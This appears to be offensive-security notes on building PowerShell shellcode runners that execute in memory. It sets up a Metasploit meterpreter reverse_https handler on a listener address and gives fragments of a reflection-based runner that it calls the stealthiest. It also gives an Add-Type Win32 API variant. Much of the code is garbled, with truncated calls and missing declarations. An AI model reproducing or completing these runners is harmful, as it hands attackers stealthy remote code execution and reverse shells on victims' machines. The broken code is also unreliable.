Powershell In-memory Shellcode Runner
shellcode to embed in .ps1:
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
Reflection Shellcode Runner without (stealthiest)
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
$tmp=@()
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
$type.
('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.()
}
Directly Calling Win32 API with .NET (less stealth)
Add-Type uses the .NET framework to compile the C# code containing Win32 API declarations; leaving temporary .csc file on disk
$Kernel32 =
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
[DllImport("kernel32")]
[DllImport("kernel32", CharSet=CharSet.Ansi)]
[DllImport("kernel32.dll", SetLastError=true)]
UInt32 dwMilliseconds);
}
$Kernel32
$size = $buf.Length
[
